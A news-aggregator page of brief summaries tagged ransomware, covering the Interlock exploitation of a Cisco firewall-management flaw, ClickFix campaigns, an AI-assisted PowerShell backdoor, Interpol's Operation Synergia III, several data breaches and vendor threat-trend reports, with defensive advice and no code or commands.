All news with #ransomware tag

🔔 ThreatsDay Bulletin highlights a wave of pragmatic, stealthy intrusions and abuse of lingering edge vulnerabilities. Notable findings include a nascent RaaS named The Gentlemen exploiting CVE-2024-55591 against FortiGate, a chained pre-auth RCE in BMC FootPrints, and active campaigns targeting Citrix NetScaler. The briefing underscores how small, well-crafted techniques— from deep-link MCP abuse to Teams phishing—are enabling remote access and data theft.

🔒 AWS analysis reveals that the Interlock ransomware group has exploited CVE-2026-20131, a critical RCE in the web-based management interface of Cisco Secure Firewall Management Center (FMC), in active attacks since January 26. The flaw can permit an unauthenticated attacker to execute arbitrary Java code as root and carries a 10.0 CVSS score. AWS recommends applying Cisco patches, reviewing IoCs and hunting for PowerShell staging, custom Java/JavaScript RATs, memory-resident webshells and unauthorized ScreenConnect deployments.

⚠️ Amazon Threat Intelligence warns of an active Interlock ransomware campaign exploiting a critical Cisco Secure Firewall Management Center vulnerability tracked as CVE-2026-20131 (CVSS 10.0). The flaw enables insecure deserialization of a user-supplied Java byte stream, allowing unauthenticated remote code execution as root. Amazon telemetry shows zero-day exploitation since January 26, 2026, and the actor's toolkit includes multi-platform backdoors, reconnaissance scripts, and infrastructure-laundering components.

🛡️ Amazon Threat Intelligence identified an active Interlock ransomware campaign exploiting CVE-2026-20131 in Cisco Secure Firewall Management Center, with exploitation observed beginning January 26, 2026—36 days before Cisco publicly disclosed the flaw on March 4, 2026. A misconfigured attacker-controlled staging server exposed Interlock's full operational toolkit, including custom remote access trojans, reconnaissance scripts, a fileless Java webshell, and infrastructure-laundering scripts. Organizations running Cisco Secure FMC should immediately apply Cisco patches, review the provided indicators of compromise, and hunt for signs of lateral movement and data staging.

🔒 Marquis, a Texas-based financial services provider, says a ransomware gang stole data for 672,075 people after compromising a SonicWall firewall on August 14, 2025. The attackers exfiltrated names, dates of birth, addresses, phone numbers, Social Security and Taxpayer Identification numbers, and financial account details without security codes. The breach disrupted operations at 74 banks and has prompted lawsuits and numerous consumer class actions.

🔒 LeakNet has begun using ClickFix on compromised websites to trick users into running malicious msiexec commands, according to ReliaQuest. The group pairs this social-engineering tactic with a staged, Deno-based in-memory loader that executes Base64-encoded JavaScript and pulls additional stages directly into memory, minimizing on-disk evidence. Post-compromise behavior is consistent and repeatable, with DLL side-loading, lateral movement via PsExec, S3-backed exfiltration, system fingerprinting (including cmd.exe klist), and eventual ransomware deployment. ReliaQuest warns the approach reduces reliance on brokers, broadens access vectors, and is being seen across varied threat activity.

🔐 GTIG and Mandiant analysis of 2025 ransomware activity shows a shift toward greater data-theft-extortion and targeting of virtualization despite declining overall profitability for operators. Exploitation of VPNs and firewalls, increased abuse of legitimate tools and cloud services, and more aggressive extortion tactics produced a record number of data-leak-site postings. REDBIKE was the most frequently observed family, and defenders saw drops in Cobalt Strike and RMM reliance. Recommended actions include patching perimeter devices, hardening virtualization, improving backup resiliency, enforcing credential hygiene, and monitoring for anomalous data egress.

🔍 Interpol coordinated Operation Synergia III from 18 July 2025 to 31 January 2026, involving law enforcement units in 72 countries and private partners. The action produced 94 arrests, the seizure of 212 electronic devices and servers, and the takedown of some 45,000 malicious IP addresses, while 110 individuals remain under investigation. The operation targeted phishing, ransomware, romance scams and credit card fraud and disrupted infrastructure used to impersonate banks, government sites and payment services. Private-sector partners including Group-IB, Trend Micro and S2W supplied intelligence that helped identify hosting and malware distribution points.

🛡️ INTERPOL announced the takedown of 45,000 malicious IP addresses and servers linked to phishing, malware, and ransomware campaigns across 72 countries. The effort, part of Operation Synergia's third phase, resulted in 94 arrests, 212 devices seized and 110 suspects under investigation. Targeted actions in Bangladesh, Togo and Macau uncovered large fraud rings and over 33,000 phishing sites.

🔒 England Hockey is investigating claims that the AiLock ransomware gang stole approximately 129GB of data and listed the organization on its leak site, threatening to publish files unless a ransom is paid. The governing body says it has prioritized an inquiry involving internal teams, external specialists, and cooperation with law enforcement. England Hockey cannot yet provide specifics while the investigation continues and urges members to remain vigilant for phishing and suspicious account activity.

🛡️ IBM X-Force researchers have linked a PowerShell backdoor called Slopoly to financially motivated group Hive0163 and report indicators that portions of the script were likely produced with a large language model. The builder-delivered payload establishes persistence via a scheduled task named Runtime Broker and was used to maintain access for more than a week in a 2026 ransomware incident. Slopoly beacons system details every 30 seconds, polls for commands every 50 seconds, executes via cmd.exe and returns results to a C2 server. Although the script lacks true self-modifying polymorphism, its comments, logging and naming conventions demonstrate how AI can accelerate malware development.

🔒 The French cybersecurity agency ANSSI reported a decrease in known ransomware incidents in 2025, recording 128 attacks versus 141 in 2024. The agency attributed the decline partly to large-scale law enforcement actions and preventive interventions by cyber defenders, including Operation Endgame. Small and medium businesses remained the most targeted, while healthcare and education saw the sharpest increases. Prominent strains included Qilin, Akira and LockBit 3.0/LockBit Black.

🎤 Infosecurity Europe 2026 has revealed a major keynote programme for its 2–4 June event at ExCeL London, featuring industry founders, former intelligence leaders and elite-sport figures. Shlomo Kramer and Cynthia Kaiser headline Tuesday with sessions on technology trends and the ransomware economy, respectively, while Jason Fox will open Thursday with a resilience and decision-making keynote. Technical talks will address AI-driven cloud threats and preparations for post-quantum cryptography.

📈 The February 2026 Check Point Global Threat Intelligence report found UK organisations saw fewer weekly attacks per organisation (1,504) than the global average (2,086), but a 36% year‑on‑year increase — nearly four times the global 9.8% rise. Education, energy & utilities, government, healthcare and financial services were among the most frequently targeted UK sectors. Ransomware remained acute, with 49 active groups and a plurality of victims attributed to Qilin, Clop and The Gentlemen. The report also warned that widespread, unmanaged GenAI use is elevating inadvertent data‑exposure risk, with one in 31 prompts judged high risk.

🔍 ESET positions its threat intelligence and telemetry as essential tools for organizations facing increasingly sophisticated cyber threats, including AI-enabled attacks and convincing deepfakes. ESET Telemetry reports a 12% decline in overall detections in India (Jan–Aug 2025), but ransomware surged 70% from H2 2024 to H1 2025 and phishing remains the most common vector. The vendor bundles endpoint, XDR, identity protection, MDR, and analyst-driven APT reporting to help CIOs and CISOs stay ahead.

⚠️ Check Point Research reports that global cyber attack volumes remained near record highs in February 2026, with an average of 2,086 weekly attacks per organization—a 9.6% year‑over‑year increase and effectively flat month‑to‑month (-0.2%). While ransomware activity eased versus the same period last year, overall attack volumes grew due to automation, expanding digital footprints, and persistent exposure risks tied to enterprise GenAI use. The findings point to a sustained, high‑pressure threat environment that demands continuous risk management.

🔒Ransomware-as-a-service (RaaS) has driven a rise in financially motivated attacks, combining double and triple extortion, data theft, and growing use of AI. Law enforcement disruptions have fragmented the marketplace and helped spawn new players such as Akira, BlackCat, and RansomHub. Attackers exploit unpatched VPNs, open RDP, phishing, and zero-day flaws to hit healthcare, manufacturing, education, telecom and critical infrastructure.

🔒 Ransomware operators are shifting from noisy, disruptive attacks to covert, long-term intrusions focused on data theft and extortion. Picus Security's Red-Teaming report—based on simulations and analysis of 1.1 million malware files and 15.5 million MITRE-mapped actions—finds most common techniques aim to remain undetected. Adversaries increasingly chain vulnerabilities, route C2 through trusted services like OpenAI and AWS, and favor persistence over immediate encryption, though some vendors dispute a reduction in overall activity.

🔒 Researchers at MalBeacon observed the threat actor Velvet Tempest using a ClickFix malvertising chain to trick victims into pasting obfuscated commands into the Windows Run dialog. Operators leveraged nested cmd.exe chains and legitimate utilities (including finger.exe and csc.exe) to stage loaders, compile .NET components, and deploy Python-based persistence under C:\ProgramData. The intrusion staged DonutLoader and retrieved the CastleRAT backdoor, though Termite ransomware was not deployed during the observed exercise.

🎓 Ransomware groups have shifted from encrypting files to extortion via stolen data, putting schools and universities at higher risk. Incidents in 2025–2026 include an attack on Sapienza University of Rome in February 2026, a vocational center in Treviso and Blacon High School, causing outages and operational disruption. Affordable, set-and-forget security that blocks phishing links and automatically scans USB devices can materially reduce exposure.